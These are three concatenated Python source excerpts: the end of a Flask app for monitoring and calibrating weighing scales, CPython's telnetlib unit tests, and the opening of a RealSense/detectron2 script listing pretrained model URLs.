        timeFrameData = {'valueList': list(), 'timeStampList': list()}
        t = threading.Thread(target=Reconnect)
        t.start()
    y = timeFrameData['valueList']
    x = timeFrameData['timeStampList']
    js_resources, css_resources = GraphCreater.GetStaticResources()
    # render template
    gfig = GraphCreater.CreateGauge(value, ki)
    pfig = GraphCreater.CreatePlot(x, y, ki, dbNotWorking, withDots=False)
    script, div = GraphCreater.GetComponentsFromFig(GraphCreater.CombineFigs('v', gfig, pfig))
    html = render_template("ScaleInfo.html", num=num, type=ki.Type, name=ki.Name,
                           unit=ki.Units, didFail=didFail, failMsg=failMsg,
                           totalNum=totalScales, plot_script=script, plot_div=div,
                           js_resources=js_resources, css_resources=css_resources)
    return GraphCreater.encodeToUTF8(html)
def ExportScaleGraphFromTimeFrame(num, hours=730):
    """Export a scale's historical data as a downloadable CSV.

    Args:
        num: 1-based scale number.
        hours: size of the history window; 730 marks the default view.

    Returns:
        A CSV file response on success; otherwise a redirect back to the
        scale page with a failure message stored in the session.

    Bug fix: url_for() takes route variables as keyword arguments; the
    original passed num/hours positionally, which raises TypeError at
    runtime on every error path.
    """
    ki = ScaleIRW.ScaleInfo(num)
    if ki.Failed:
        session['failMsg'] = "An error occurred while loading scale info."
        if hours == 730:
            return redirect(url_for('getScale', num=num))
        else:
            return redirect(url_for('getScaleWithTimeFrame', num=num, hours=hours))
    dbNotWorking = False
    try:
        if ScaleDataDB.Connected == True:
            timeFrameData = ScaleDataDB.GetTimeFrameFor(ki, hours)
        else:
            raise Exception('GetTimeFrameFor failed')
    except Exception:
        dbNotWorking = True
        ScaleDataDB.Connected = False
        session['failMsg'] = "An error occurred while exporting historical data."
        if hours == 730:
            return redirect(url_for('getScale', num=num))
        else:
            return redirect(url_for('getScaleWithTimeFrame', num=num, hours=hours))
    y = timeFrameData['valueList']
    x = timeFrameData['timeStampList']
    if not os.path.isdir(exportDir):
        os.makedirs(exportDir)
    timeStamp = datetime.datetime.fromtimestamp(time.time()).strftime('%Y%m%d-%H%M%S')
    exportPath = exportDir + "/" + timeStamp + ".csv"
    # Context manager guarantees the file is closed even if a write fails.
    with open(exportPath, "w") as FW:
        FW.write("Secs Ago,Value\n")
        for xi, yi in zip(x, y):
            FW.write(str(xi) + "," + str(yi) + "\n")
    return send_from_directory(exportDir, timeStamp + ".csv", as_attachment=True)
@app.route('/ScaleInfo=<int:num>', methods=['GET', 'POST'])
def getScale(num):
    """Show a scale's detail page (GET) or dispatch one of its form actions (POST)."""
    if request.method == 'GET':
        return CreateScaleGraphFromTimeFrame(num)
    if request.form['_action'] == "Export":
        return ExportScaleGraphFromTimeFrame(num)
    elif request.form['_action'] == 'DELETE':
        ki = ScaleIRW.ScaleInfo(num)
        ki.Delete()
        return redirect(url_for('home'))
    elif request.form['_action'] == 'ShowLastDay':
        return redirect(url_for('getScaleWithTimeFrame', num=num, hours=24))
    elif request.form['_action'] == 'ShowLastWeek':
        return redirect(url_for('getScaleWithTimeFrame', num=num, hours=(24*7)))
    elif request.form['_action'] == 'ShowHoursAgo':
        h = request.form['HoursAgo']
        try:
            int(h)  # validate the user-supplied hour count
        except Exception:
            session['failMsg'] = "An error occurred while processing your input."
            return redirect(url_for('getScale', num=num))
        return redirect(url_for('getScaleWithTimeFrame', num=num, hours=h))
    elif request.form['_action'] == 'ShowDefault':
        return redirect(url_for('getScale', num=num))
    # Fallback: unknown actions previously fell through returning None (HTTP 500).
    return redirect(url_for('getScale', num=num))
@app.route('/ScaleInfo=<int:num>t=<int:hours>', methods=['GET', 'POST'])
def getScaleWithTimeFrame(num, hours):
    """Scale detail page restricted to the last `hours` hours of history."""
    if request.method == 'GET':
        return CreateScaleGraphFromTimeFrame(num, hours)
    if request.form['_action'] == "Export":
        return ExportScaleGraphFromTimeFrame(num, hours)
    elif request.form['_action'] == 'DELETE':
        ki = ScaleIRW.ScaleInfo(num)
        ki.Delete()
        return redirect(url_for('home'))
    elif request.form['_action'] == 'ShowLastDay':
        return redirect(url_for('getScaleWithTimeFrame', num=num, hours=24))
    elif request.form['_action'] == 'ShowLastWeek':
        return redirect(url_for('getScaleWithTimeFrame', num=num, hours=(24*7)))
    elif request.form['_action'] == 'ShowHoursAgo':
        h = request.form['HoursAgo']
        try:
            int(h)  # validate the user-supplied hour count
        except Exception:
            session['failMsg'] = "An error occurred while processing your input."
            return redirect(url_for('getScaleWithTimeFrame', num=num, hours=hours))
        return redirect(url_for('getScaleWithTimeFrame', num=num, hours=h))
    elif request.form['_action'] == 'ShowDefault':
        return redirect(url_for('getScale', num=num))
    # Fallback: unknown actions previously fell through returning None (HTTP 500).
    return redirect(url_for('getScaleWithTimeFrame', num=num, hours=hours))
@app.route('/AddScale')
def addScale():
    """Render the Add Scale form, surfacing any queued failure message once."""
    if 'failMsg' not in session:
        didFail, failMsg = "False", "None"
    else:
        didFail, failMsg = "True", session.pop('failMsg', None)
    scale_count = ScaleIRW.GetNumOfScales()
    return render_template("AddScale.html", num=scale_count, didFail=didFail, failMsg=failMsg)
@app.route('/AddScale<int:num>/Range', methods=['GET', 'POST'])
def setScaleRange(num):
    """Calibrate scale *num*'s empty/full raw readings.

    GET renders the calibration form pre-filled with the stored range.
    POST samples the hardware and/or persists the submitted range,
    depending on which submit button was pressed.
    """
    totalNum = ScaleIRW.GetNumOfScales()
    s = ScaleIRW.ScaleInfo(num)
    if request.method == 'GET':
        return render_template("SetRange.html", totalNum=totalNum, num=num, lr=s.EmptyValue, ur=s.FullValue)
    elif request.method == 'POST':
        # NOTE(review): GPIO is started for every POST branch; presumably
        # required before sampling the load cell -- confirm.
        s.startGPIO()
        if request.form['submit'] == 'Get Empty Value':
            # Sample the hardware for the empty reading, keep the form's full value.
            s.GetLowerRange()
            s.SetRange(s.EmptyValue, request.form['FullValue'])
            return redirect(url_for('setScaleRange', num=num))
        elif request.form['submit'] == 'Get Full Value':
            # Sample the hardware for the full reading, keep the form's empty value.
            s.GetUpperRange()
            s.SetRange(request.form['EmptyValue'], s.FullValue)
            return redirect(url_for('setScaleRange', num=num))
        elif request.form['submit'] == 'Set':
            # Persist both values exactly as submitted.
            s.SetRange(request.form['EmptyValue'], request.form['FullValue'])
            return redirect(url_for('getScale', num=num))
@app.route('/AddScale', methods=['POST'])
def addScalePost():
    """Create a new scale from the submitted form and move on to range calibration."""
    scale_type = request.form['Type']
    name = request.form['Name']
    max_capacity = request.form['MaxCapacity']
    units = request.form['Units']
    data_pin = request.form['DataPin']
    clock_pin = request.form['ClockPin']
    count_before = ScaleIRW.GetNumOfScales()
    num = ScaleIRW.AddScaleInfoToFile(scale_type, name, max_capacity, units, data_pin, clock_pin)
    # An unchanged scale count means the add was rejected; report and retry.
    if count_before == ScaleIRW.GetNumOfScales():
        session['failMsg'] = "An error occurred while processing your input."
        return redirect(url_for('addScale'))
    return redirect(url_for('setScaleRange', num=num))
@app.route('/Settings', methods=['GET','POST'])
def changeSettings():
    """View and persist application configuration.

    GET renders the settings page pre-filled from CfgRW.cfgVars.
    POST validates the numeric fields, writes every submitted value back to
    the config file, and optionally reboots the host.
    """
    totalNum = ScaleIRW.GetNumOfScales()
    if request.method == 'GET':
        currentDBToUse = CfgRW.cfgVars["dbToUse"]
        currentSimulateData = CfgRW.cfgVars["simulateData"]
        currentUseCQuickPulse = CfgRW.cfgVars["useCQuickPulse"]
        currentUseMedianOfData = CfgRW.cfgVars["useMedianOfData"]
        currentUselatestFromMongoAsCurrent = CfgRW.cfgVars["uselatestFromMongoAsCurrent"]
        currentLoadSamplesPerRead = CfgRW.cfgVars["loadSamplesPerRead"]
        currentLaunchScaleAggregatorOnStart = CfgRW.cfgVars["launchScaleAggregatorOnStart"]
        currentAggregatorSecsPerPersist = CfgRW.cfgVars["aggregatorSecsPerPersist"]
        currentAggregatorLoopsOfPersists = CfgRW.cfgVars["aggregatorLoopsOfPersists"]
        currentAggregatorPrintPushes = CfgRW.cfgVars["aggregatorPrintPushes"]
        currentDBHostServer = CfgRW.cfgVars["dbHostServer"]
        currentDBHostPort = CfgRW.cfgVars["dbHostPort"]
        currentDBName = CfgRW.cfgVars["dbName"]
        currentDBCollectionName = CfgRW.cfgVars["dbCollectionName"]
        if 'failMsg' not in session:
            didFail = "False"
            failMsg = "None"
        else:
            didFail = "True"
            failMsg = session.pop('failMsg', None)
        return render_template("ChangeSettingPage.html", totalNum=totalNum, currentDBToUse=currentDBToUse, currentSimulateData=currentSimulateData, currentUseCQuickPulse=currentUseCQuickPulse,
                               currentUseMedianOfData=currentUseMedianOfData, currentAggregatorSecsPerPersist=currentAggregatorSecsPerPersist, currentAggregatorLoopsOfPersists=currentAggregatorLoopsOfPersists,
                               currentAggregatorPrintPushes=currentAggregatorPrintPushes, currentDBHostServer=currentDBHostServer, currentDBHostPort=currentDBHostPort, currentDBName=currentDBName,
                               currentDBCollectionName=currentDBCollectionName, num=ScaleIRW.GetNumOfScales(), didFail=didFail, failMsg=failMsg, currentLaunchScaleAggregatorOnStart=currentLaunchScaleAggregatorOnStart,
                               currentLoadSamplesPerRead=currentLoadSamplesPerRead, currentUselatestFromMongoAsCurrent=currentUselatestFromMongoAsCurrent)
    elif request.method == 'POST':
        try:
            # Reject non-integer input before any config mutation happens.
            int(request.form['aggregatorSecsPerPersist'])
            int(request.form['aggregatorLoopsOfPersists'])
            int(request.form['loadSamplesPerRead'])
            int(request.form['dbHostPort'])
        except (KeyError, ValueError):
            # Was a bare except: only bad or missing form input belongs here.
            session['failMsg'] = "An error occurred while processing your input."
            return redirect(url_for('changeSettings'))
        # Form field names match the config keys one-to-one.
        for key in ("dbToUse", "simulateData", "useCQuickPulse", "useMedianOfData",
                    "uselatestFromMongoAsCurrent", "loadSamplesPerRead",
                    "launchScaleAggregatorOnStart", "aggregatorSecsPerPersist",
                    "aggregatorLoopsOfPersists", "aggregatorPrintPushes",
                    "dbHostServer", "dbHostPort", "dbName", "dbCollectionName"):
            CfgRW.cfgVars[key] = request.form[key]
        CfgRW.CreateNewCFGFile()
        if request.form["submit"] == "Set and Restart":
            os.system('sudo reboot')
        return redirect(url_for('home'))
def LogFilePath():
    """Return the full path of the application log file."""
    return f"{logDir}/{logFile}"
def DeleteLogFile():
    """Remove the current log file from disk."""
    path = LogFilePath()
    os.remove(path)
def closeLoggerHandlers():
    """Close and detach every handler attached to the Flask app logger.

    Iterates over a *copy* of the handler list: the original code removed
    handlers from the same list it was iterating, which skips every other
    handler and can leave some attached and open.
    """
    for handler in list(app.logger.handlers):
        handler.close()
        app.logger.removeHandler(handler)
def createHandler():
    """Build and return a DEBUG-level file handler writing to the app log file."""
    handler = logging.FileHandler(LogFilePath())
    handler.setLevel(logging.DEBUG)
    handler.setFormatter(logging.Formatter('%(levelname)s\t%(asctime)s \t%(message)s'))
    return handler
if __name__ == "__main__":
    # Optionally launch the background aggregator alongside the web app.
    if CfgRW.cfgVars["launchScaleAggregatorOnStart"].upper() == "TRUE":
        # Subshell keeps the `cd` from leaking; `&` detaches the process.
        os.system("(cd ../ScaleAggregator/; python ScaleAggregator.py &)")
    if not app.debug:
        # File logging only outside debug mode (Flask logs to stderr in debug).
        if not os.path.exists(logDir):
            os.makedirs(logDir)
        file_handler = createHandler()
        app.logger.setLevel(logging.DEBUG)
        app.logger.addHandler(file_handler)
    # threaded=True serves concurrent requests; bind on all interfaces.
    app.run(threaded=True, host='0.0.0.0')
|
test_telnetlib.py | import socket
import select
import telnetlib
import time
import contextlib
import unittest
from unittest import TestCase
from test import support
threading = support.import_module('threading')
HOST = support.HOST
def server(evt, serv):
    """Accept a single connection on *serv*, signalling readiness via *evt*.

    The listening socket is always closed on exit; a socket.timeout while
    waiting for the connection is silently ignored.
    """
    serv.listen(5)
    evt.set()
    try:
        conn, addr = serv.accept()
    except socket.timeout:
        pass
    else:
        conn.close()
    finally:
        serv.close()
class GeneralTests(TestCase):
    """Connection/timeout behaviour of telnetlib.Telnet against a one-shot server."""

    def setUp(self):
        # Server thread accepts exactly one connection then exits (see server()).
        self.evt = threading.Event()
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.settimeout(60)  # Safety net. Look issue 11812
        self.port = support.bind_port(self.sock)
        self.thread = threading.Thread(target=server, args=(self.evt,self.sock))
        self.thread.setDaemon(True)
        self.thread.start()
        self.evt.wait()  # don't connect before the server is listening

    def tearDown(self):
        self.thread.join()
        del self.thread  # Clear out any dangling Thread objects.

    def testBasic(self):
        # connects
        telnet = telnetlib.Telnet(HOST, self.port)
        telnet.sock.close()

    def testTimeoutDefault(self):
        # Telnet() must pick up socket.getdefaulttimeout() when no timeout given.
        self.assertTrue(socket.getdefaulttimeout() is None)
        socket.setdefaulttimeout(30)
        try:
            telnet = telnetlib.Telnet(HOST, self.port)
        finally:
            socket.setdefaulttimeout(None)
        self.assertEqual(telnet.sock.gettimeout(), 30)
        telnet.sock.close()

    def testTimeoutNone(self):
        # None, having other default: timeout=None overrides the global default.
        self.assertTrue(socket.getdefaulttimeout() is None)
        socket.setdefaulttimeout(30)
        try:
            telnet = telnetlib.Telnet(HOST, self.port, timeout=None)
        finally:
            socket.setdefaulttimeout(None)
        self.assertTrue(telnet.sock.gettimeout() is None)
        telnet.sock.close()

    def testTimeoutValue(self):
        # An explicit timeout is applied to the underlying socket.
        telnet = telnetlib.Telnet(HOST, self.port, timeout=30)
        self.assertEqual(telnet.sock.gettimeout(), 30)
        telnet.sock.close()

    def testTimeoutOpen(self):
        # Same as above but via open() on an unconnected Telnet instance.
        telnet = telnetlib.Telnet()
        telnet.open(HOST, self.port, timeout=30)
        self.assertEqual(telnet.sock.gettimeout(), 30)
        telnet.sock.close()
class SocketStub(object):
    """A socket stand-in that records writes and serves queued reads."""

    def __init__(self, reads=()):
        self.reads = list(reads)  # copy so the caller's sequence is untouched
        self.writes = []
        self.block = False

    def sendall(self, data):
        # Record outgoing data instead of sending it anywhere.
        self.writes.append(data)

    def recv(self, size):
        chunk = b''
        while self.reads and len(chunk) < size:
            chunk += self.reads.pop(0)
        if len(chunk) > size:
            # Push the excess back for the next call.
            self.reads.insert(0, chunk[size:])
            chunk = chunk[:size]
        return chunk
class TelnetAlike(telnetlib.Telnet):
    """Telnet subclass wired for SocketStub: no real fd, msg() output captured."""

    def fileno(self):
        # A SocketStub has no file descriptor; selecting on it would be a bug.
        raise NotImplementedError()

    def close(self): pass

    def sock_avail(self):
        # Data is "available" whenever the stub is not flagged as blocking.
        return (not self.sock.block)

    def msg(self, msg, *args):
        # Capture debug output into self._messages instead of stdout.
        with support.captured_stdout() as out:
            telnetlib.Telnet.msg(self, msg, *args)
        self._messages += out.getvalue()
        return
def mock_select(*s_args):
    """select.select() replacement driven by TelnetAlike's sock.block flag.

    Returns empty ready-lists when the (last seen) TelnetAlike's stub socket
    is blocking, otherwise echoes the arguments back as the ready sets.
    """
    blocked = False
    for fd_list in s_args:
        for fob in fd_list:
            if isinstance(fob, TelnetAlike):
                blocked = fob.sock.block
    return [[], [], []] if blocked else s_args
class MockPoller(object):
    """Mock of select.poll() driven by TelnetAlike's sock.block flag."""

    test_case = None  # Set during TestCase setUp.

    def __init__(self):
        self._file_objs = []

    def register(self, fd, eventmask):
        tc = self.test_case
        tc.assertTrue(hasattr(fd, 'fileno'), fd)
        tc.assertEqual(eventmask, select.POLLIN | select.POLLPRI)
        self._file_objs.append(fd)

    def poll(self, timeout=None):
        blocked = False
        for fob in self._file_objs:
            if isinstance(fob, TelnetAlike):
                blocked = fob.sock.block
        if blocked:
            return []
        return zip(self._file_objs, [select.POLLIN] * len(self._file_objs))

    def unregister(self, fd):
        self._file_objs.remove(fd)
@contextlib.contextmanager
def test_socket(reads):
    """Temporarily patch socket.create_connection to hand out a SocketStub."""
    def stub_factory(*ignored):
        return SocketStub(reads)
    saved = socket.create_connection
    socket.create_connection = stub_factory
    try:
        yield None
    finally:
        # Always restore the real implementation, even on error.
        socket.create_connection = saved
def test_telnet(reads=(), cls=TelnetAlike, use_poll=None):
    """Return a telnetlib.Telnet object of *cls* whose SocketStub serves *reads*."""
    for chunk in reads:
        assert type(chunk) is bytes, chunk
    with test_socket(reads):
        telnet = cls('dummy', 0)
        telnet._messages = ''  # collects debuglevel output
        if use_poll is not None:
            if use_poll and not telnet._has_poll:
                raise unittest.SkipTest('select.poll() required.')
            # Force the requested implementation (poll vs select).
            telnet._has_poll = use_poll
    return telnet
class ExpectAndReadTestCase(TestCase):
    """Base class that swaps select.select/select.poll for the mocks above."""

    def setUp(self):
        self.old_select = select.select
        select.select = mock_select
        self.old_poll = False  # falsy sentinel when the platform lacks poll()
        if hasattr(select, 'poll'):
            self.old_poll = select.poll
            select.poll = MockPoller
            MockPoller.test_case = self

    def tearDown(self):
        # Restore poll first (only if it was patched), then select.
        if self.old_poll:
            MockPoller.test_case = None
            select.poll = self.old_poll
        select.select = self.old_select
class ReadTests(ExpectAndReadTestCase):
    """Exercise every read_*() variant against queued SocketStub data."""

    def test_read_until(self):
        """
        read_until(expected, timeout=None)
        test the blocking version of read_until
        """
        want = [b'xxxmatchyyy']
        telnet = test_telnet(want)
        data = telnet.read_until(b'match')
        self.assertEqual(data, b'xxxmatch', msg=(telnet.cookedq, telnet.rawq, telnet.sock.reads))

        reads = [b'x' * 50, b'match', b'y' * 50]
        expect = b''.join(reads[:-1])
        telnet = test_telnet(reads)
        data = telnet.read_until(b'match')
        self.assertEqual(data, expect)

    def test_read_until_with_poll(self):
        """Use select.poll() to implement telnet.read_until()."""
        want = [b'x' * 10, b'match', b'y' * 10]
        telnet = test_telnet(want, use_poll=True)
        select.select = lambda *_: self.fail('unexpected select() call.')
        data = telnet.read_until(b'match')
        self.assertEqual(data, b''.join(want[:-1]))

    def test_read_until_with_select(self):
        """Use select.select() to implement telnet.read_until()."""
        want = [b'x' * 10, b'match', b'y' * 10]
        telnet = test_telnet(want, use_poll=False)
        if self.old_poll:
            select.poll = lambda *_: self.fail('unexpected poll() call.')
        data = telnet.read_until(b'match')
        self.assertEqual(data, b''.join(want[:-1]))

    def test_read_all(self):
        """
        read_all()
        Read all data until EOF; may block.
        """
        reads = [b'x' * 500, b'y' * 500, b'z' * 500]
        expect = b''.join(reads)
        telnet = test_telnet(reads)
        data = telnet.read_all()
        self.assertEqual(data, expect)
        return

    def test_read_some(self):
        """
        read_some()
        Read at least one byte or EOF; may block.
        """
        # test 'at least one byte'
        telnet = test_telnet([b'x' * 500])
        data = telnet.read_some()
        self.assertTrue(len(data) >= 1)
        # test EOF
        telnet = test_telnet()
        data = telnet.read_some()
        self.assertEqual(b'', data)

    def _read_eager(self, func_name):
        """
        read_*_eager()
        Read all data available already queued or on the socket,
        without blocking.
        """
        want = b'x' * 100
        telnet = test_telnet([want])
        func = getattr(telnet, func_name)
        telnet.sock.block = True
        self.assertEqual(b'', func())
        telnet.sock.block = False
        data = b''
        while True:
            try:
                data += func()
            except EOFError:
                break
        self.assertEqual(data, want)

    def test_read_eager(self):
        # read_eager and read_very_eager make the same guarantees
        # (they behave differently but we only test the guarantees)
        self._read_eager('read_eager')
        self._read_eager('read_very_eager')
        # NB -- we need to test the IAC block which is mentioned in the
        # docstring but not in the module docs

    def test_read_very_lazy(self):
        # BUG FIX: this method was named read_very_lazy (no test_ prefix),
        # so unittest never discovered or ran it.
        want = b'x' * 100
        telnet = test_telnet([want])
        self.assertEqual(b'', telnet.read_very_lazy())
        while telnet.sock.reads:
            telnet.fill_rawq()
        data = telnet.read_very_lazy()
        self.assertEqual(want, data)
        self.assertRaises(EOFError, telnet.read_very_lazy)

    def test_read_lazy(self):
        want = b'x' * 100
        telnet = test_telnet([want])
        self.assertEqual(b'', telnet.read_lazy())
        data = b''
        while True:
            try:
                read_data = telnet.read_lazy()
                data += read_data
                if not read_data:
                    telnet.fill_rawq()
            except EOFError:
                break
            self.assertTrue(want.startswith(data))
        self.assertEqual(data, want)
class nego_collector(object):
    """Records option-negotiation traffic seen during a telnet read.

    sb_getter, when provided, is called to drain subnegotiation data each
    time an SE command is seen.
    """

    def __init__(self, sb_getter=None):
        self.seen = b''
        self.sb_getter = sb_getter
        self.sb_seen = b''

    def do_nego(self, sock, cmd, opt):
        self.seen += cmd + opt
        if cmd == tl.SE and self.sb_getter:
            self.sb_seen += self.sb_getter()
tl = telnetlib  # short alias; tests below refer to protocol constants as tl.IAC, tl.SB, etc.
class WriteTests(TestCase):
    '''The only thing that write does is replace each tl.IAC for
    tl.IAC+tl.IAC'''

    def test_write(self):
        samples = [
            b'data sample without IAC',
            b'data sample with' + tl.IAC + b' one IAC',
            b'a few' + tl.IAC + tl.IAC + b' iacs' + tl.IAC,
            tl.IAC,
            b'',
        ]
        for payload in samples:
            telnet = test_telnet()
            telnet.write(payload)
            sent = b''.join(telnet.sock.writes)
            # Every IAC byte must be doubled on the wire; nothing else changes.
            self.assertEqual(payload.replace(tl.IAC, tl.IAC + tl.IAC), sent)
class OptionTests(TestCase):
    """Option negotiation: IAC command handling, subnegotiation, debug output."""

    # RFC 854 commands
    cmds = [tl.AO, tl.AYT, tl.BRK, tl.EC, tl.EL, tl.GA, tl.IP, tl.NOP]

    def _test_command(self, data):
        """ helper for testing IAC + cmd """
        telnet = test_telnet(data)
        data_len = len(b''.join(data))
        nego = nego_collector()
        telnet.set_option_negotiation_callback(nego.do_nego)
        txt = telnet.read_all()
        cmd = nego.seen
        self.assertTrue(len(cmd) > 0) # we expect at least one command
        self.assertIn(cmd[:1], self.cmds)
        self.assertEqual(cmd[1:2], tl.NOOPT)
        # IAC+cmd bytes are consumed by negotiation, not returned as text.
        self.assertEqual(data_len, len(txt + cmd))
        nego.sb_getter = None # break the nego => telnet cycle

    def test_IAC_commands(self):
        # Each RFC 854 command must be stripped from the stream and reported
        # via the negotiation callback, wherever it appears in the data.
        for cmd in self.cmds:
            self._test_command([tl.IAC, cmd])
            self._test_command([b'x' * 100, tl.IAC, cmd, b'y'*100])
            self._test_command([b'x' * 10, tl.IAC, cmd, b'y'*10])
        # all at once
        self._test_command([tl.IAC + cmd for (cmd) in self.cmds])

    def test_SB_commands(self):
        # RFC 855, subnegotiations portion
        send = [tl.IAC + tl.SB + tl.IAC + tl.SE,
                tl.IAC + tl.SB + tl.IAC + tl.IAC + tl.IAC + tl.SE,
                tl.IAC + tl.SB + tl.IAC + tl.IAC + b'aa' + tl.IAC + tl.SE,
                tl.IAC + tl.SB + b'bb' + tl.IAC + tl.IAC + tl.IAC + tl.SE,
                tl.IAC + tl.SB + b'cc' + tl.IAC + tl.IAC + b'dd' + tl.IAC + tl.SE,
               ]
        telnet = test_telnet(send)
        nego = nego_collector(telnet.read_sb_data)
        telnet.set_option_negotiation_callback(nego.do_nego)
        txt = telnet.read_all()
        self.assertEqual(txt, b'')
        # Doubled IACs inside a subnegotiation must collapse to a single IAC.
        want_sb_data = tl.IAC + tl.IAC + b'aabb' + tl.IAC + b'cc' + tl.IAC + b'dd'
        self.assertEqual(nego.sb_seen, want_sb_data)
        self.assertEqual(b'', telnet.read_sb_data())
        nego.sb_getter = None # break the nego => telnet cycle

    def test_debuglevel_reads(self):
        # test all the various places that self.msg(...) is called
        given_a_expect_b = [
            # Telnet.fill_rawq
            (b'a', ": recv b''\n"),
            # Telnet.process_rawq
            (tl.IAC + bytes([88]), ": IAC 88 not recognized\n"),
            (tl.IAC + tl.DO + bytes([1]), ": IAC DO 1\n"),
            (tl.IAC + tl.DONT + bytes([1]), ": IAC DONT 1\n"),
            (tl.IAC + tl.WILL + bytes([1]), ": IAC WILL 1\n"),
            (tl.IAC + tl.WONT + bytes([1]), ": IAC WONT 1\n"),
           ]
        for a, b in given_a_expect_b:
            telnet = test_telnet([a])
            telnet.set_debuglevel(1)
            txt = telnet.read_all()
            self.assertIn(b, telnet._messages)
        return

    def test_debuglevel_write(self):
        telnet = test_telnet()
        telnet.set_debuglevel(1)
        telnet.write(b'xxx')
        expected = "send b'xxx'\n"
        self.assertIn(expected, telnet._messages)

    def test_debug_accepts_str_port(self):
        # Issue 10695
        with test_socket([]):
            telnet = TelnetAlike('dummy', '0')
            telnet._messages = ''
        telnet.set_debuglevel(1)
        telnet.msg('test')
        self.assertRegex(telnet._messages, r'0.*test')
class ExpectTests(ExpectAndReadTestCase):
    """expect() must return everything read before (excluding) the match."""

    def test_expect(self):
        """
        expect(expected, [timeout])
        Read until the expected string has been seen, or a timeout is
        hit (default is no timeout); may block.
        """
        want = [b'x' * 10, b'match', b'y' * 10]
        telnet = test_telnet(want)
        (_,_,data) = telnet.expect([b'match'])
        self.assertEqual(data, b''.join(want[:-1]))

    def test_expect_with_poll(self):
        """Use select.poll() to implement telnet.expect()."""
        want = [b'x' * 10, b'match', b'y' * 10]
        telnet = test_telnet(want, use_poll=True)
        # Fail loudly if the implementation falls back to select().
        select.select = lambda *_: self.fail('unexpected select() call.')
        (_,_,data) = telnet.expect([b'match'])
        self.assertEqual(data, b''.join(want[:-1]))

    def test_expect_with_select(self):
        """Use select.select() to implement telnet.expect()."""
        want = [b'x' * 10, b'match', b'y' * 10]
        telnet = test_telnet(want, use_poll=False)
        if self.old_poll:
            # Fail loudly if the implementation still tries poll().
            select.poll = lambda *_: self.fail('unexpected poll() call.')
        (_,_,data) = telnet.expect([b'match'])
        self.assertEqual(data, b''.join(want[:-1]))
def test_main(verbose=None):
    """Entry point for regrtest: run every test class in this module."""
    support.run_unittest(GeneralTests, ReadTests, WriteTests, OptionTests,
                         ExpectTests)

if __name__ == '__main__':
    test_main()
|
realsense.py | import numpy as np
import time
import cv2
import pyrealsense2 as rs
import random
import math
import argparse
from threading import Thread
from matplotlib import pyplot as plt
from mpl_toolkits.axes_grid1.inset_locator import inset_axes
from mpl_toolkits.mplot3d import proj3d
from mpl_toolkits.mplot3d import Axes3D
from matplotlib.patches import FancyArrowPatch
from detectron2.engine import DefaultPredictor
from detectron2.config import get_cfg
from detectron2.utils.visualizer import Visualizer
from detectron2.utils.visualizer import GenericMask
from detectron2.utils.visualizer import ColorMode
from detectron2.structures import Boxes, RotatedBoxes
from detectron2.data import MetadataCatalog
import torch, torchvision
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
import os
import pkg_resources
from detectron2.checkpoint import DetectionCheckpointer
from detectron2.modeling import build_model
# >>---------------------- load predefined model -------------------
class _ModelZooUrls(object):
    """
    Mapping from names to officially released Detectron2 pre-trained models.

    Checkpoint URL is S3_PREFIX + config name (without .yaml) + "/" + suffix;
    see get_checkpoint_url().
    """
    S3_PREFIX = "https://dl.fbaipublicfiles.com/detectron2/"
    # format: {config_path.yaml} -> model_id/model_final_{commit}.pkl
    CONFIG_PATH_TO_URL_SUFFIX = {
        # COCO Detection with Faster R-CNN
        "COCO-Detection/faster_rcnn_R_50_C4_1x.yaml": "137257644/model_final_721ade.pkl",
        "COCO-Detection/faster_rcnn_R_50_DC5_1x.yaml": "137847829/model_final_51d356.pkl",
        "COCO-Detection/faster_rcnn_R_50_FPN_1x.yaml": "137257794/model_final_b275ba.pkl",
        "COCO-Detection/faster_rcnn_R_50_C4_3x.yaml": "137849393/model_final_f97cb7.pkl",
        "COCO-Detection/faster_rcnn_R_50_DC5_3x.yaml": "137849425/model_final_68d202.pkl",
        "COCO-Detection/faster_rcnn_R_50_FPN_3x.yaml": "137849458/model_final_280758.pkl",
        "COCO-Detection/faster_rcnn_R_101_C4_3x.yaml": "138204752/model_final_298dad.pkl",
        "COCO-Detection/faster_rcnn_R_101_DC5_3x.yaml": "138204841/model_final_3e0943.pkl",
        "COCO-Detection/faster_rcnn_R_101_FPN_3x.yaml": "137851257/model_final_f6e8b1.pkl",
        "COCO-Detection/faster_rcnn_X_101_32x8d_FPN_3x.yaml": "139173657/model_final_68b088.pkl",
        # COCO Detection with RetinaNet
        "COCO-Detection/retinanet_R_50_FPN_1x.yaml": "190397773/model_final_bfca0b.pkl",
        "COCO-Detection/retinanet_R_50_FPN_3x.yaml": "190397829/model_final_5bd44e.pkl",
        "COCO-Detection/retinanet_R_101_FPN_3x.yaml": "190397697/model_final_971ab9.pkl",
        # COCO Detection with RPN and Fast R-CNN
        "COCO-Detection/rpn_R_50_C4_1x.yaml": "137258005/model_final_450694.pkl",
        "COCO-Detection/rpn_R_50_FPN_1x.yaml": "137258492/model_final_02ce48.pkl",
        "COCO-Detection/fast_rcnn_R_50_FPN_1x.yaml": "137635226/model_final_e5f7ce.pkl",
        # COCO Instance Segmentation Baselines with Mask R-CNN
        "COCO-InstanceSegmentation/mask_rcnn_R_50_C4_1x.yaml": "137259246/model_final_9243eb.pkl",
        "COCO-InstanceSegmentation/mask_rcnn_R_50_DC5_1x.yaml": "137260150/model_final_4f86c3.pkl",
        "COCO-InstanceSegmentation/mask_rcnn_R_50_FPN_1x.yaml": "137260431/model_final_a54504.pkl",
        "COCO-InstanceSegmentation/mask_rcnn_R_50_C4_3x.yaml": "137849525/model_final_4ce675.pkl",
        "COCO-InstanceSegmentation/mask_rcnn_R_50_DC5_3x.yaml": "137849551/model_final_84107b.pkl",
        "COCO-InstanceSegmentation/mask_rcnn_R_50_FPN_3x.yaml": "137849600/model_final_f10217.pkl",
        "COCO-InstanceSegmentation/mask_rcnn_R_101_C4_3x.yaml": "138363239/model_final_a2914c.pkl",
        "COCO-InstanceSegmentation/mask_rcnn_R_101_DC5_3x.yaml": "138363294/model_final_0464b7.pkl",
        "COCO-InstanceSegmentation/mask_rcnn_R_101_FPN_3x.yaml": "138205316/model_final_a3ec72.pkl",
        "COCO-InstanceSegmentation/mask_rcnn_X_101_32x8d_FPN_3x.yaml": "139653917/model_final_2d9806.pkl", # noqa
        # COCO Person Keypoint Detection Baselines with Keypoint R-CNN
        "COCO-Keypoints/keypoint_rcnn_R_50_FPN_1x.yaml": "137261548/model_final_04e291.pkl",
